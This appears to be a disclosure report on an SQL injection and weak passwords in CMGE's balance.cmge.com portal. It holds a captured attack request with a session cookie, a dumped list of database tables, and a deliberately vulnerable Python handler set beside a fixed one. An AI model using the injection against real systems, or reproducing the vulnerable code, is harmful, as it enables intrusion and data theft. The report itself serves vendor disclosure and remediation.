2015-12-26: Details have been sent to the vendor and are awaiting processing.
2015-12-28: The vendor has confirmed the report; details are disclosed to the vendor only.
2016-01-06: The vendor has fixed the vulnerability and proactively disclosed it; details are now public.
CMGE China Mobile Games listed on NASDAQ in the United States on 25 September 2012 (NASDAQ:CMGE); it is the first Chinese mobile game company to list on NASDAQ.
http://balance.cmge.com
First, weak passwords: a number of accounts on the portal use trivially guessable passwords.
Log in with any one of these accounts; the project summary query (项目总表查询) is vulnerable to SQL injection.
POST /project/doProjectList.action HTTP/1.1
Host: balance.cmge.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: */*
Accept-Language: zh,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://balance.cmge.com/index.action
Content-Length: 109
Cookie: Hm_lvt_000253421fb8b207dc2b9d3d879bcf44=1450791153,1450791315,1450792816,1450845176; s_fid=47810FD7CFDD27C6-26FEF33986935D12; s_nr=1450791332694; s_vnum=1453383332695%26vn%3D2; Hm_lvt_269a9dbb19b027f2039ac8601dd97088=1450795555,1450795590,1450845186,1450970145; pgv_pvi=8132900984; Hm_lvt_76b2c7f11d8255635828ff5ab3b82031=1450794876; JSESSIONID=0A3D1BB42E7569B666F58909099CD61C
X-Forwarded-For: 127.0.0.1
Connection: keep-alive

project.status=-1&project.verifionStatus=-1&project.invalid=false&project.id=&project.customerName=&ajax=true
Database: kkfun_smart
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| SMART_REPORT_STAT                | 9661943 |
| PROJECT_ACTIVATION               | 1291880 |
| IP_PROVINCE_DUAN                 | 1128100 |
| SMART_LOG_TEMP_CP_CHECK          |  638685 |
| HFIVE_REPORT                     |  361509 |
| HFIVE_REPORT_bak                 |   56755 |
| HFIVE_FEE_LOG                    |   48503 |
| CUSTOMER_LOG                     |   39838 |
| PROJECT_PRODUCT_PANNER_COOPERATE |   34107 |
| SMART_DAILY_201502               |   29229 |
| SMART_DAILY_201501               |   29047 |
| SMART_DAILY_201503               |   28403 |
| SMART_DAILY_201412               |   27972 |
| SMART_DAILY_201511               |   23361 |
| SMART_DAILY_201510               |   20734 |
| SMART_DAILY_201512               |   19453 |
| SMART_DAILY_201509               |   19068 |
| SMART_DAILY_201508               |   18737 |
| SMART_DAILY_201507               |   18490 |
| SMART_DAILY_201506               |   16543 |
| SMART_DAILY_201505               |   16413 |
| SMART_DAILY_201504               |   14168 |
| ANDROID_REPORT_201501            |   10873 |
| ANDROID_REPORT_201502            |   10754 |
| ANDROID_REPORT_201412            |   10201 |
| ANDROID_REPORT_201503            |   10151 |
| ANDROID_REPORT_201507            |    5147 |
| ANDROID_REPORT_201511            |    5017 |
| ANDROID_REPORT_201504            |    4576 |
| ANDROID_REPORT_201505            |    4547 |
| ANDROID_REPORT_201508            |    4392 |
| ANDROID_REPORT_201506            |    4325 |
| ANDROID_REPORT_201510            |    4052 |
| ANDROID_REPORT_201512            |    3813 |
| ANDROID_REPORT_201509            |    3777 |
| SMART_LOG_TEMP_CP                |    2662 |
| PRODUCT_PORTAL_LCD               |    2661 |
| SMART_DAILY_TEMP                 |    2450 |
| ANDROID_LOG_ERROR                |    2355 |
| PROJECT                          |    1593 |
| BALANCE_PROJECT_SMART            |    1531 |
| SUIYUE_BALANCE_MONTH             |    1360 |
| SMART_MONTH_201502               |    1095 |
| SMART_MONTH_201503               |    1043 |
| SMART_MONTH_201501               |    1037 |
| SMART_MONTH_201412               |    1002 |
| PORTAL_USER                      |     924 |
| SMART_MONTH_201512               |     818 |
| SMART_MONTH_201511               |     806 |
| SMART_MONTH_201510               |     752 |
| SMART_MONTH_201507               |     669 |
| SMART_MONTH_201509               |     659 |
| SMART_MONTH_201508               |     626 |
| SMART_MONTH_201506               |     546 |
| SMART_MONTH_201504               |     500 |
| PRODUCT_PANNER_PRICE             |     468 |
| SMART_MONTH_201505               |     464 |
| BALANCE_PANNER_RATE              |     400 |
| SYS_MENU_USER_SMART              |     379 |
| SUIYUE_BALANCE_PROJECT           |     369 |
| ANDROID_CHANGE_PERCENT           |     343 |
| CUSTOMER                         |     323 |
| CONTENT_PROVIDER                 |     270 |
| SMART_ACT_PERCENT                |     223 |
| SUIYUE_BALANCE_PROJECT_TEMP      |     201 |
| SYS_MENU_ROLE_SMART              |     199 |
| SUIYUE_BALANCE_ACCOUNT           |     175 |
| PRODUCT_COOPERATE                |     125 |
| TOTAL_BALANCE_ACCOUNT            |     124 |
| SUIYUEMESSAGE                    |     110 |
| BALANCE_PROJECT_ADVERT           |      96 |
| PRODUCT                          |      79 |
| PANNER_ACCOUNT                   |      63 |
| ACTIVATION_LOG_201507            |      61 |
| ACTIVATION_LOG_TEMP              |      61 |
| SYS_MENU_SMART                   |      49 |
| BD_GROUP_RELATION                |      39 |
| BANK                             |      32 |
| PRODUCT_PROJECT_VERSION          |      22 |
| LCD_PIXEL                        |      15 |
| SUIYUE_BALANCE_SWITCH            |      12 |
| TOTAL_BALANCE_SWITCH             |      11 |
| MONITORS                         |      10 |
| BUSINESS_DEVELOPER               |       8 |
| PORTAL                           |       5 |
| INVOICE_TYPE                     |       4 |
| PROJECT_VERSION                  |       3 |
| AGENT                            |       1 |
| BALANCE_SWITCH                   |       1 |
| CMGE_BALANCE_SWITCH              |       1 |
+----------------------------------+---------+
Suggested fix: add a CAPTCHA to the login and filter the query parameters.
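As an added illustration of the parameter-filtering fix (example code, not the CMGE application's own, whose source the report does not show), the following Python stands in for the doProjectList.action handler: a hypothetical string-concatenating version beside a hardened one that validates each parameter from the captured request and binds it as a value. The project table and its rows are constructed for the example.

```python
import sqlite3

# Constructed sample schema and rows; the real kkfun_smart schema is not known.
SAMPLE_ROWS = [
    (1, "Game A", "Customer One", 1, 1, 0),
    (2, "Game B", "Customer Two", 0, 1, 0),
    (3, "Game C", "Customer Three", 1, 0, 1),
]


def make_db():
    """In-memory database standing in for the portal's project table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE project (id INTEGER, name TEXT, customer_name TEXT,"
                 " status INTEGER, verify_status INTEGER, invalid INTEGER)")
    conn.executemany("INSERT INTO project VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def list_projects_vulnerable(conn, params):
    """Hypothetical handler consistent with the finding: request text is pasted into the SQL."""
    sql = ("SELECT id FROM project WHERE customer_name = '"
           + params.get("project.customerName", "") + "' AND invalid = "
           + ("1" if params.get("project.invalid") == "true" else "0"))
    return [row[0] for row in conn.execute(sql)]


def list_projects_safe(conn, params):
    """Hardened handler: each parameter is checked against its expected type and
    bound by the driver, so request text cannot change the shape of the query."""
    clauses = []
    # -1 is the "any" sentinel in the captured request; non-numeric input raises ValueError.
    status = int(params.get("project.status", "-1"))
    verify = int(params.get("project.verifionStatus", "-1"))
    if status != -1:
        clauses.append(("status = ?", status))
    if verify != -1:
        clauses.append(("verify_status = ?", verify))
    invalid = params.get("project.invalid", "false")
    if invalid not in ("true", "false"):
        raise ValueError("project.invalid must be 'true' or 'false'")
    clauses.append(("invalid = ?", 1 if invalid == "true" else 0))
    if params.get("project.id"):
        clauses.append(("id = ?", int(params["project.id"])))
    if params.get("project.customerName"):
        clauses.append(("customer_name = ?", params["project.customerName"]))
    sql = "SELECT id FROM project WHERE " + " AND ".join(c for c, _ in clauses)
    return [row[0] for row in conn.execute(sql, [v for _, v in clauses])]
```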
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-12-28 10:40
Development has already been contacted to handle it. Thanks, brother hecate.
2016-01-06: Fixed, thank you!